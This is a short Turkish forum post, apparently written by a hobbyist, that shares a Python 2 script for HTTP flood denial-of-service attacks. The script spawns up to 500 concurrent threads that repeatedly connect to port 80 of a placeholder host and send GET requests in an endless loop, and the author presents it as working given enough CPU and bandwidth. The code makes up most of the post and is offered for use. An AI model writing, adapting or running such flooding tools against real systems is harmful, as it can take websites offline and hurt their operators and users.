http flood yapmak icin minik bir scriptcik yazdim python da..
iyi islemci ve bw istiyor, eger bunlar saglanirsa basarili bir sekilde flood yapabilir, su anda biraz kasir sadece..
:)

baska pek bi onemi yok ama hani konseptlere alismak acisindan iyi oldu..

buyrunuz..

#!/usr/bin/env python
#DOS soket ivir zivir deneyen minik prg Can Deger can AT luniz.net

import socket, thread
from threading import Semaphore
import sys

h=0
host="www.deneme.com"
sayi=500
sema=Semaphore(int(sayi))

payload="GET / HTTP/1.1\n"

def go(host,payload,h):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,80))
s.send(payload)
print ".",
s.close()
sema.release()

except:
s.close()
sema.release()


print "hadi bakalim...\n"
while 1:
h=h+1
sema.acquire()
thread.start_new(go, (host,payload,h))